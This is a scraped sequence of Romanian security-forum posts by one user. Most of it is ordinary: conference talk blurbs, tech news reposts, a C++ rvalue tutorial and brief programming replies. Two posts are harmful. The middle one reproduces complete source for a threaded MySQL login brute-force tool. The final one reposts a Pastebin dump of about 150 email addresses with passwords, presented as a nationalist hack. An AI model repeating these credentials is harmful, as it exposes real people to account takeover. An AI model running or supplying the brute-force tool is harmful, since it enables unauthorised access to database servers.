Nytro

[h=1]28C3: How governments have tried to block Tor (en)[/h] For more information visit: 28C3: speakers To download the video visit: Documentation - 28C3 public wiki Playlist 28C3: 28C3: Behind Enemy Lines - YouTube Speakers: Jacob Appelbaum | Roger Dingledine Iran blocked Tor handshakes using Deep Packet Inspection (DPI) in January 2011 and September 2011. Bluecoat tested out a Tor handshake filter in Syria in June 2011. China has been harvesting and blocking IP addresses for both public Tor relays and private Tor bridges for years. Roger Dingledine and Jacob Appelbaum will talk about how exactly these governments are doing the blocking, both in terms of what signatures they filter in Tor (and how we've gotten around the blocking in each case), and what technologies they use to deploy the filters -- including the use of Western technology to operate the surveillance and censorship infrastructure in Tunisia (Smartfilter), Syria (Bluecoat), and other countries. We'll cover what we've learned about the mindset of the censor operators (who in many cases don't want to block Tor because they use it!), and how we can measure and track the wide-scale censorship in these countries. Last, we'll explain Tor's development plans to get ahead of the address harvesting and handshake DPI arms races. Link: Tocmai l-am vazut, e ceva ce trebuie vazut, ce s-a intamplat in Iran, China, Siria, Tunisia, Egipt se poate intampla si la noi, si e bine sa stim ce se intampla, ce se poate face pentru monitorizarea traficului.

Ai nevoie de host? Nu ai bani din chestiile private si unice si smechere pe care le ai, probabil gasite de tine? Sa fim seriosi, e o porcarie ideea.

Hackerii care stiu sa descarce LOIC si sa dea un click. Profesionisti.

E scanf, citeste. Returneaza 0 in caz de eroare, ceea ce probabil se intampla si aici, sau numarul de chestii citite. Aici, citeste "%d" + 2. Acel "%d" e in memorie % d NULL, deci practic e un: scanf(NULL); adica returneaza 0. Oricum nu e afisat nimic, dar asa functioneaza.

"dfsdfdsf" - sir de caractere, pointer la sir de caractere terminat in NULL "%d" - idem mai sus "%d" + 2 - idem mai sus, +2 la adresa pointerului

Ai incercat pe o versiune mai veche de kernel? Kernelul are suport pentru "promiscuous mode"? Poate IOCTL-ul SIOCSIFFLAGS nu e folosit cum trebuie, poate au fost facute modificari pe versiunile mai noi de kernel, desi nu cred... Am citit putin, si pare ceva legat de modul in care se seteaza placa de retea in "promiscuous mode", fie cu ifconfig, fie programabil, cu acest IOCTL, dar nu am timp acum sa citesc si nu cred ca as gasi ceva concret.

Da, dragut, speram sa aflu cate ceva despre exploit-ul in sine. Am citit "povestea" unui stack overflow intr-un alt tip de fisier, tot in VLC, si e extrem de interesant, cum a fost gasit acel stack overflow si cum s-a putut exploata. Si nu e deloc simplu. Oricum, VLC are un parser pentru formatele de fisiere, si cred ca ar trebui sa mearga pentru orice extensie a acelui fisier. De asemenea, VLC parca avea si un plugin pentru Mozilla, oare se va executa payload-ul daca acel fisier e pus intr-un HTML sa fie vizualizat in browser?

Sincer, nu m-a impresionat nimic.

MySQL Brute Force Tool Authored by James Stevenson | Site stev.org Posted Jan 19, 2012 This is a small MySQL cracking tool capable of running login attempts from multiple threads in parallel. It is capable of 1024 concurrent connections. /* * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU Library General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $ * * Author: * NAME: James Stevenson * WWW: http://www.stev.org * */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <getopt.h> #include <string.h> #include <pthread.h> #include <mysql/mysql.h> int verbose = 0; int total = 0; volatile int quit = 0; pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER; struct args { char *host; char *db; int port; }; void print_help(FILE *fp, char *app) { fprintf(fp, "Usage: %s [<options>]\n", app); fprintf(fp, "\n"); fprintf(fp, " -h Print this help and exit\n"); fprintf(fp, " -v Verbose. Repeat for more info\n"); fprintf(fp, " -t <host> host to try\n"); fprintf(fp, " -p <port> port to connect on\n"); fprintf(fp, " -n <num> number of threads to use\n"); fprintf(fp, "\n"); fprintf(fp, "Note: usernames / password will be read from stdin\n"); fprintf(fp, "The format for this is username:password\n"); fprintf(fp, "\n"); } int try(char *hostname, char *username, char *password, char *db, int port) { MYSQL mysql; mysql_init(&mysql); if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) { switch(mysql_errno(&mysql)) { case 1045: /* ER_ACCESS_DENIED_ERROR */ if (verbose >= 1) printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; default: printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql)); break; } return 0; } if (verbose >= 1) printf("Success: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql)); mysql_close(&mysql); return 1; } int getpassword(char **buf, size_t *buflen, char **username, char **password) { pthread_mutex_lock(&mutex_pass); if (getline(buf, buflen, stdin) >= 0) { pthread_mutex_unlock(&mutex_pass); char *tmp = strchr(*buf, ':'); if (tmp == 0 || tmp[1] == 0) return 0; *username = *buf; *tmp = 0; tmp++; *password = tmp; tmp = strchr(*password, '\n'); if (tmp != 0) *tmp = 0; if (verbose >= 2) printf("username: %s password: %s\n", *username, *password); return 1; } pthread_mutex_unlock(&mutex_pass); return 0; } void *run(void *p) { struct args *a = (struct args *) p; char *buf = 0; size_t buflen = 0; char *user = 0; char *pass = 0; while(quit == 0) { if (getpassword(&buf, &buflen, &user, &pass) == 0) goto free; /* we ran out of passwords */ if (try(a->host, user, pass, a->db, a->port)) { printf("Success! Username: %s Password: %s\n", user, pass); quit = 1; goto free; } } free: if (buf != NULL) free(buf); pthread_exit(NULL); return NULL; } int main(int argc, char **argv) { struct args args; pthread_t *thd; pthread_attr_t attr; int nthreads = 1; int i = 0; int c; memset(&args, 0, sizeof(args)); while( (c = getopt(argc, argv, "d:hn:p:t:v")) != -1) { switch(c) { case 'd': args.db = optarg; break; case 'h': print_help(stdout, argv[0]); exit(EXIT_SUCCESS); break; case 'n': nthreads = atoi(optarg); break; case 't': args.host = optarg; break; case 'v': verbose++; break; case 'p': args.port = atoi(optarg); break; } } if (args.db == NULL) args.db = "mysql"; if (args.host == NULL) args.host = "localhost"; thd = malloc(nthreads * sizeof(*thd)); if (!thd) { perror("malloc"); exit(EXIT_FAILURE); } mysql_library_init(0, NULL, NULL); if (pthread_attr_init(&attr) != 0) { perror("pthread_attr_init"); exit(EXIT_FAILURE); } if (pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE) != 0) { perror("pthread_attr_setdetachstate"); exit(EXIT_FAILURE); } for(i=0;i<nthreads;i++) { if (pthread_create(&thd[i], NULL, run, &args) != 0) { perror("pthread_create"); exit(EXIT_FAILURE); } } for(i=0;i<nthreads;i++) { if (pthread_join(thd[i], NULL) != 0) { perror("pthread_join"); exit(EXIT_FAILURE); } } pthread_attr_destroy(&attr); free(thd); mysql_library_end(); return EXIT_SUCCESS; } Sursa: MySQL Brute Force Tool ? Packet Storm

Cauta cartea "Java de la 0 la expert", am vazut-o pe la Diverta parca. Acopera mult din ceea ce inseamna Java si e explicata pas cu pas. Inca o data spun, cred ca e printre cele mai bune carti pe care le-am citit. PS: Sfatul meu e sa nu te angajezi, nu intr-un domeniu despre care nu stii foarte multe pentru ca e posibil sa nu iti placa. Cel mai bine cauti un job cu limbajul de programare care iti place.

MD5 = 32 caractere in hex, are 16 bytes Caractere alfa-numerice: 62 (a-z, A-Z, 0-9) Dimensiune parola: 6 caractere Combinatii posibile: 62 ^ 6 Bytes necesari: 62 ^ 6 * 16 = 908803769344 bytes = 846 TB Sper ca nu am gresit la calculate. Nu te poti baza doar pe cuvinte de dictionar. Practic cred ca 80% dintre parole NU sunt cuvinte de dictionar. Bine, 10% dintre ele sunt: "123456", "qwerty"... Ganditi-va si voi la toate parolele pe care le aveti. Cate sunt cuvinte de dictionar?

Azi s-a atins numarul de 300.000 de posturi. Nu e nimic important, dar e frumos statistic. "Threads: 43,813, Posts: 300,077, Members: 54,770" Totusi, nu e importanta cantitatea, importanta e calitatea. Singura parte urata e ca aproximativ 85.000 de posturi sunt la Offtopic. Sa speram ca pe viitor va creste atat cantitatea, cat si calitatea posturilor, ca membrii se vor axa mai mult pe discutii tehnice si ca nu se vor pierde in teme OTV-iste populand cu zeci de pagini topicuri penibile. Sa speram ca numarul tutorialelor si a discutiilor stric legate de domeniile pe care forumul vrea sa le acopere va creste semnificativ si ca numarul membrilor interesati de acumularea unor noi cunostinte va exploda. // Muie SOPA

[h=1]Cum arata noul sistem de fisiere Windows 8 (servere)[/h]de Liviu Petrescu | 18 ianuarie 2012 Pana acum, Windows 8 a atras interesul presei prin interfata Metro. Noul sistem de operare Microsoft va oferi si un nou sistem de fisiere, ce va fi disponibil doar in varianta Windows Server 8. Pe baza cunoscutului NTFS, dezvoltatorii au creat ReFS (Resilient File System) ce va fi introdus initial doar in versiunea pentru servere a Windows 8, scrie MaximumPC. Creat de la zero, sistemul ReFS pastreaza o mare parte dintre functionalitatile NTFS, dar a fost descris ca mult mai rezistent. Imbunatatirile aduse prin noul sistem ReFS includ verificarea si corectarea a automata a datelor stocate. Sistemul va opera orice rectificare "live", fara sa aiba nevoie de trecerea in mod offline. ReFS va oferi si integritate meta data cu checksums, suport pentru volume mari de fisiere si foldere si verificarea automata a hard disk-urilor pentru eliminarea erorilor latente. Sursa: Cum arata noul sistem de fisiere Windows 8 (servere) | Hit.ro

[h=1]6 iunie, data la care lumea trece la IPv6[/h]de Liviu Petrescu | 18 ianuarie 2012 Infrastructura Internetului este pe cale de a suporta un upgrade major. In data de 6 iunie 2012, Internet Protocol version 4 va incepe sa fie abandonat in favoarea lui IPv6. O mare parte dintre companiile telecom, dintre producatorii de echipamente de networking si dintre companiile de web au ales data de 6 iunie 2012 pentru implementarea IPv6, potrivit Slashdot. Versiunea actuala a Internet Protocol permite conectatarea la retea a aproximativ 4,3 miliarde de statii, numar ce se apropie rapid de limita superioara. IPv6 va "extinde" internetul, dar data de 6 iunie este doar primul pas. Operatorii telecom au promis ca minim 1% dintre utilizatorii rezidentiali vor incepe sa acceseze site-urile compatibile la aceasta data, numarul lor urmand sa creasca tot mai repede. Google, Facebook si Bing se numara printre companiile care sustin upgrade-ul rapid al infrastructurii internetului. Trecerea la IPv6 a fost testata pentru o zi de multe companii in data de 8 iunie 2011, dar cele mai multe au revenit la IPv4. De aceasta data, trecerea va fi ireversibila. Sursa: 6 iunie, data la care lumea trece la IPv6 | Hit.ro

De ce si "dl"? Credeam ca safe_mode va fi deprecated in versiunea 6. Sau va fi Off implicit, nu mai stiu. Oricum util, desi sunt lucruri cunoscute de la versiuni mai vechi.

Ce probleme sunt pe forum? In afara de chat.

Nu e asta o problema. Ciudat, e trimis un singur pachet.

[h=1]Wikipedia Going Dark to Protest SOPA[/h] Wikpedia will go offline Wednesday to protest the Stop Online Piracy Act (SOPA), according to Co-Founder Jimmy Wales. Wales made the announcement via a series of tweets. “This is going to be wow,” reads one tweet. “I hope Wikipedia will melt phone systems in Washington on Wednesday. Tell everyone you know!” Jimmy Wales @jimmy_wales This is going to be wow. I hope Wikipedia will melt phone systems in Washington on Wednesday. Tell everyone you know! Wales has been mulling the idea of a blackout on his user talk page. Wikipedia joins other major websites, such as Reddit, where a very active anti-SOPA community exists. Wales tweeted that the decision was made by community consensus among Wikipedia users: David Monniaux @dmonniaux 16 Jan 12 @jimmy_wales Will this affect users outside of the US? Jimmy Wales @jimmy_wales @dmonniaux The emerging consensus of the community seems to be for a global blackout of English Wikipedia. 16 Jan 12 According to another tweet by Wales, Wikipedia English receives approximately 25 million visitors every day. Wikipedia’s decision means those millions of visitors will be greeted not with the usual digital tome of knowledge, but with a screen explaining the company’s stance on the bill and information on how to take action against SOPA. The blackout will only effect the English language page. “Student warning! Do your homework early,” joked Wales in another tweet. “Wikipedia protesting bad law on Wednesday!” Jimmy Wales @jimmy_wales Student warning! Do your homework early. Wikipedia protesting bad law on Wednesday! #sopa 16 Jan 12 Late last week, the authors of both SOPA and the Protect IP Act (PIPA) announced they would be removing the DNS blocking provisions from both bills. The DNS acts as a kind of “phone book” for the Internet, and many in the tech community warned that interfering with DNS would have catastrophic consequences for the stability and security of the Internet. However, many – including Wales – have responded with a whole-hearted “that’s not good enough.” An anti-SOPA Twitter, tweeted today that “closing a global business in reaction to single-issue national politics is foolish,” perhaps an indication that Twitter will not be following in the footsteps of Wikipedia and Reddit. Meanwhile, Rupert Murdoch, CEO of News Corporation, went on a Twitter diatribe lambasting the Obama administration for failing to support SOPA. Sursa: Wikipedia Going Dark to Protest SOPA

Topicul e din 2008. Probabil s-a mai schimbat cate ceva in 3-4 ani...

Derpbox secure replacement for Dropbox [h=1]Derpbox[/h] [h=2]What?[/h] Derpbox is a secure replacement for Dropbox, written in bash. Released under the beer-ware license, a pint of cider is fine too. It runs fine with GNU bash 4.2.8 and rsync 3.0.7. [h=2]Why?[/h] I've been hearing from Dropbox for years now, it started with "hey, this thing is awesome" and promptly went "how is that called 'security?'" and now is "WTF, they are copyrighting our files". I still don't really have the need for Dropbox but I sure could use something to sync my .bashrc and .vimrc across all my work and home machines. So I wrote something awesome, secure and open. Bash for the awesomeness, rsync for the security and open because I like beer. [h=2]How?[/h] Derpbox uses rsync to synchronize files and relies on cron to do it automatically. When two files are in conflict, the most recent one is used. If the server was updated after you made modifications to your local file, your changes will be lost. [h=2]Secure?[/h] As secure as SSH can be. [h=2]Installation?[/h] [h=3]Three, easy steps to install derpbox :[/h] Place all the .sh files in a directory, ~/.derp can do fine. Edit config.sh and change what you need. Run install.sh. [h=3]Three, easy steps to setup a derpbox repository :[/h] Install rsync. Create a dir you will use as $DBOX_RPATH in the client. Get back to work. [h=3]One, easy extra step for the clients and the server :[/h] Don't forget to have a proper SSH configuration and working SSH keys, otherwise the derpbox won't work. [h=2]Removal?[/h] I don't know why you would do that, but just in case : Run remove.sh Remove manually all the files and scripts. Download: https://github.com/L-P/Derpbox Muie vBulletin.

Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again ! A self proclaimed Indian Hacker, Ankit Fadia became a favorite target of young Indian Hackers the first week of 2012. In last week, Mr. FADIA got hacked two to three times by different young Indian hackers. Last week members of Teamgreyhat managed to breach the website of Mr.Fadia and today another Hacker, "Himanshu Sharma" with the code name “??¢???” hacked the same server on which Ankit's website was hosted. In this attack these hackers have successfully hacked into the Ankit Fadia's offcial site and exposed lots of credentials including sensitive data, student details, Database credentials (DB Name, User Name & Password) and many more. Not only was Ankit's website hacked, 2508 others sites hosted on same server also got hacked and their databases were also dumped by these young hackers. Ankit Fadia offers Ankit Fadia Certified Ethical Hacker (AFCEH) certificates to those who take his courses on ethical hacking, where he gives lectures on security tools, techniques and methods. Mr. Fadia also comes on national TV at MTV on a techie show called "What The Hack". Most of the time he claims that he will give a reward to anyone who will hack him (May be in order to promote himself as the most secured hacker). Well, there are 100's of Hackers who hacked Ankit Fadia after this award was announced! So, will Mr. Ankit gives these guys a reward or he will take legal action against them ? Last year Mr. Ankit was also hacked by Indian and Pakistani Hackers multiple times using various methods. After being hacked then, why has Mr. Fadia not fixed all vulnerabilities ? Is he not aware about all hacking methods ? Or may be he is not able to fix his own website? These Questions are being asked various AFCEH students, who got certification of Hacking from Mr. Fadia. Mr. Himanshu Sharma at the age of 17, has revealed vulnerabilities for many Fortune 500 companies. He has been listed in the “Hall of Fame” for companies like: Google, Microsoft, Facebook, Apple , Samsung, India TV,IIT Bombay Rediff, Mediafire, Dreamtemplate, TemplateMonster, Channel [V], Pizzahut, Kfc, BBC, Sony and Universities like Stanford University, Virginia University and More.. Why aren’t these young hackers getting any chance to grow ? Why are they not getting a chance to present their talent? Why aren’t they able to help the nation by working for security? Most obviously, these young hackers have much more talent than any other self claimed Hackers. Moreover, Himanshu and all these hackers want to challenge Mr. Fadia on national TV. Well we know that it's a big demand by kids, but they have guts to prove themselves. We have another interesting article on Pastebin, that contains reasonable truth about all his claims. Read here and here and justify this for yourself. Sursa: Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again ! | The Hacker News (THN)

Hashcat - GUI [h=3]Additional requirements:[/h] Windows users require Microsoft visual C++ redistributable package [h=2]Features[/h] Supports all platforms used by hashcat (CPU, OpenCL, CUDA) Supports all hashcat implementations (hashcat, oclHashcat-plus, oclHashcat-lite) Free Multi-OS (Linux & Windows native binaries) Multi-Platform (32-bit & 64-bit) ... and much more [h=2]Hashcat-GUI Screenshot Windows[/h] [h=2]Hashcat-GUI Screenshot Linux[/h] [h=2]Tested OS[/h] All Windows and Linux versions should work on both 32 and 64 bit Download: http://hashcat.net/files/download.php?proj=hashcat-gui Sursa: hashcat-gui - advanced password recovery

Comprehensive Experimental Analyses of Automotive Attack Surfaces Stephen Checkoway, Damon McCoy, Brian Kantor, Danny Anderson, Hovav Shacham, and Stefan Savage University of California, San Diego Karl Koscher, Alexei Czeskis, Franziska Roesner, and Tadayoshi Kohno University of Washington Abstract Modern automobiles are pervasively computerized, and hence potentially vulnerable to attack. However, while previous research has shown that the internal networks within some modern cars are insecure, the associated threat model—requiring prior physical access—has justifiably been viewed as unrealistic. Thus, it remains an open question if automobiles can also be susceptible to remote compromise. Our work seeks to put this question to rest by systematically analyzing the external attack surface of a modern automobile. We discover that remote exploitation is feasible via a broad range of attack vectors (including mechanics tools, CD players, Bluetooth and cellular radio), and further, that wireless communications channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration and theft. Finally, we discuss the structural characteristics of the automotive ecosystem that give rise to such problems and highlight the practical challenges in mitigating them. Download: http://www.autosec.org/pubs/cars-usenixsec2011.pdf

[h=2]C++ Rvalue References Explained[/h]By Thomas Becker Last updated: September 2011 [h=3]Contents[/h] Introduction Move Semantics Rvalue References Forcing Move Semantics Is an Rvalue Reference an Rvalue? Move Semantics and Compiler Optimizations Perfect Forwarding: The Problem Perfect Forwarding: The Solution Rvalue References and Exceptions The Case of the Implicit Move Acknowledgments and Further Reading [h=4]Introduction[/h] Rvalue references are a feature of C++ that was added with the C++11 standard. Rvalue references are elusive. I have personally overheard several people with very, very big names in the C++ community say these things: "Everytime I think I have grasped rvalue references, they evade me again." "Oh those rvalue references. I'm having a real hard time wrapping my head around that." "I dread having to teach rvalue references." The nasty thing about rvalue references is that when you look at them, it is not at all clear what their purpose might be or what problems they might solve. Therefore, I will not jump right in and explain what rvalue references are. A better approach is to start with the problems that are to be solved, and then show how rvalue references provide the solution. That way, the definition of rvalue references will appear plausible and natural to you. Rvalue references solve at least two problems: Implementing move semantics Perfect forwarding If you are not familiar with these problems, do not worry. Both of them will be explained in detail below. We'll start with move semantics. But before we're ready to go, I need to remind you of what lvalues and rvalues are in C++. Giving a rigorous definition is surprisingly difficult, but the explanation below is good enough for the purpose at hand. The original definition of lvalues and rvalues from the earliest days of C is as follows: An lvalue is an expression e that may appear on the left or on the right hand side of an assignment, whereas an rvalue is an expression that can only appear on the right hand side of an assignment. For example, int a = 42; int b = 43; // a and b are both l-values: a = b; // ok b = a; // ok a = a * b; // ok // a * b is an rvalue: int c = a * b; // ok, rvalue on right hand side of assignment a * b = 42; // error, rvalue on left hand side of assignment In C++, this is still useful as a first, intuitive approach to lvalues and rvalues. However, C++ with its user-defined types has introduced some subtleties regarding modifiability and assignability that cause this definition to be incorrect. There is no need for us to go further into this. Here is an alternate definition which, although it can still be argued with, will put you in a position to tackle rvalue references: An lvalue is an expression that refers to a memory location and allows us to take the address of that memory location via the & operator. An rvalue is an expression that is not an lvalue. Examples are: // lvalues: // int i = 42; i = 43; // ok, i is an lvalue int* p = &i; // ok, i is an lvalue int& foo(); foo() = 42; // ok, foo() is an lvalue int* p1 = &foo(); // ok, foo() is an lvalue // rvalues: // int foobar(); int j = 0; j = foobar(); // ok, foobar() is an rvalue int* p2 = &foobar(); // error, cannot take the address of an rvalue j = 42; // ok, 42 is an rvalue If you are interested in a rigorous definition of rvalues and lvalues, a good place to start is Mikael Kilpeläinen's ACCU article on the subject. Sursa: C++ Rvalue References Explained

Fresh arab Facebook user's + password's By: Inject | Jan 14th, 2012 Hello, I am an Israeli hacker, and I intend to publish a list of Facebook users and passwords of Arabs To show that we are The Israelis can do more than the Arab peoples. I have lists of many site's. When this war starts i will publish all of my lists. ______________________________________________________________________________________________ Facebook users and passwords saleem.shazad@yahoo.com - 123456789 aslamparwez@yahoo.com - d3bviwmp asmalik_architect@yahoo.com - asdqwe dr.tension@hotmail.com - byb926qc1 forchiniot123@yahoo.com - begoodyou gallent_120@yahoo.com - jahangir ghazanfarsher1@gmail.com - pakistan haseeb.ahmed.siddiqui@gmail.com - mintoamber imran4t88@gmail.com - 20031989 jvdhdr@yahoo.com - 412667895 kamran_rafiq80@hotmail.com - ptjn01 khan_75120@yahoo.com - musakhan kiani.1212@yahoo.com - nomi225888 Leo8826@gmail.com - realking librawah@yahoo.com - hotlove LOVE2U4NOTHING@GMAIL.COM - KHAN0786 lucky4u_762@yahoo.com - godooo lyca205@yahoo.com - jihadi maya_kanwal1@yahoo.com - aassdd mazharhussain34@gmail.com - mmzhr439712 md_shahzaib@yahoo.com - 6663819 medstu2005-2010@hotmail.com - panaxgensing mehdihassan_zaidi@yahoo.com - s4u03002118090 mehmood@enaan.com - karachik mehmoodahmd@gmail.com - mobilink mian0321@yahoo.com - 2637997 michael.jhonson@ymail.com - 5021368 mirshazadumer@gmail.com - muzafer.283 mkhitran99@yahoo.com - nabeel99\ mks_attari92@hotmail.com - 6692201 mmuraadkhan@yahoo.com - 6473509 mohdraza1@hotmail.com - haqhoo mohsin61115@yahoo.com - 7151386 momink@hotmail.com - mr431718 montaz42@yahoo.com - 871957 moon_afridi@yahoo.com - 123456 mrasifgold@gmail.com - asif1234 MrizwanT20@yahoo.com - Mtankdik ms-zindgee2707@yahoo.com - 270707 msabir279@hotmail.com - experts msameer85@hotmail.com - reemas123 msrhmankhan@hotmail.com - 55667788 mubasherkaleem@ymail.com - 786555687 mudasar.ali98@yahoo.com - doctor98 muhammad.abdulraouf@yahoo.com - 3334952302 muhammadfaizan30@hotmail.com - 79727972 Muhammad_Bilal26@yahoo.com - 123456 mujtabaccs@hotmail.com - pakistan mumtazjournalist@gmail.com - 03215473472 mumtazzaidi@live.com - assa32 muneebk4@gmail.com - makl04041967 Muzammil63@hotmail.Com - 4322450 my_deep_heart001@yahoo.com - aassdd m_iimran@hotmail.com - 1366998136 m_khalid21@yahoo.com - mk2002 nadeem_lhr4u@yahoo.com - 412967123 Naeemrai@rocketmail.Com - 6228849 naeemuddin31@gmail.com - 0216330663 naima.khan237@yahoo.com - ptclptcl nanoo_ji@yahoo.com - wasimahmad nasirattari786@hotmail.com - 123786 nasirnnt2005@hotmail.com - 5496568 nawazmalhi@yahoo.com - malhiji nidamardan@yahoo.com - sakhan nisargullali@yahoo.com - 111111 nooreesultan@ymail.com - 337.?s pakindia00@yahoo.com - 786786 phoolnawaz@yahoo.com - pakistan pioneer5844462@hotmail.com - windycity prince_sunny143@hotmail.com - malik1980 printo_doon@hotmail.com - pakistani qadir_sky1@yahoo.com - aassdd rabeetsh@yahoo.com - 582022 raja_sahil50@yahoo.com - 3630663 ramzan_4646@in.com - 4646045 ranajoni253@yahoo.com - 661507 RASHIDMALIK420@YAHOO.COM - JANG123 ratifimran@yahoo.com - bhaijani rehmat_wadaykhel@yahoo.com - kaleemullah rnasim73@yahoo.com - loc1334 s.fanfactory@gmail.com - 15141526 saaawan@yahoo.com - 03215123486 saazam2003@hotmail.com - mughalpura sabzawary@yahoo.com - shahzia saddabahar@yahoo.com - Sumaniloveyou sadiamajeed50@yahoo.com - lifeme sahil_haider_me@yahoo.com - ibmg74 SAIMA_KHAN42030@YAHOO.COM - 2272970 sajidahmed86@yahoo.com - aloneboy sajid_712@yahoo.com - ansari sajjalnoor@yahoo.com - abcdef saleem.shazad@yahoo.com - 123456789 salman_08_khan@yahoo.com - dharam samycool10@hotmail.com - jivepakistan sardarharis98@yahoo.com - 123456789 sarfraz_444@yahoo.com - 268097 sarmadlighari@yahoo.com - samsung SBAA@YAHOO.COM. - MISBAH SBAA@YAHOO.COM - misbah shadsial786@yahoo.com - 7372699 shafiq_dadly@yahoo.com - pakistan shafeeqars@yahoo.com - naseem shaheenakhtar91@yahoo.com - 7762282 shahid6501@gmail.com - humtum shahid849@hotmail.com - spa1969 shahidhameed20@yahoo.com - 967450 s_khan_123@yahoo.com - 6730143 tahirullahkhan@gmail.com - xkuzmpls tahir_sahil2006@yahoo.com - lahore1983 tahrieemb@yahoo.com - 03004589743 tamojananis@hotmail.com - 860086 tania_bano123@yahoo.com - 898989 tanveersajid23@yahoo.com - 5635044 tanzilmunir@yahoo.com - azao0102 tariqaftab.ptcl@hotmail.com - 08550855 tariqshahzad_124@yahoo.com - 123456 tariq_jamalli@yahoo.com - jamali65 terminator_bug2005@yahoo.com - bal12266 Theifof_heart@yahoo.com - 7737177 tippu_656@yahoo.com - Lahore7284507 toobi_a@yahoo.com - nafram tsn_345@yahoo.com - bindas treen24@yahoo.com - 841365 Uetian.78@gmail.Com - adgjmp ul13@ymail.com - izharlovedjhero umar_eagle@yahoo.com - attitude47 usama137@gmail.com - 03346796918 waheed_malik31@yahoo.com - ghazal wajid9419@yahoo.com - 6137634 waqar702@gmail.com - 786786 wasimabbaschanna@yahoo.com - 0217722271 wasi_wasi2002@yahoo.com - 03006886087 weyalkh@gmail.com - weyalkh12 www.ch.moazzam-phambra@hotmail.com - barnala www.dilg11@yahoo.com - love2life www.mshoaibarshad@yahoo.com - spiderman www.shakeel_shehzad786@yahoo.com - 123456 yamaan@yahoo.com - muhammadyamaan YAQUB_USAMA@YAHOO.COM - 0543430741 ymahmood71@gmail.com - national yourtrulywellwisher@yahoo.com - 1234567 zafarnadvi@gmail.com - 26011976 zahimgelani@yahoo.com - computer zahoorellahi336@gmail.com - 31193366 Zainqurishi@gmail.com - 2512005 zain_ul_abedeen11@yahoo.com - 4569178 zee4zaara@yahoo.com - drrahul ZEESHANAZ@hotmail.COM - TBJJKA ZEESHANAZ@MSN.COM - TBJJKA zirva_luv_4u@yahoo.com - 786786786 Sursa: Fresh arab Facebook user's + password's - Pastebin.com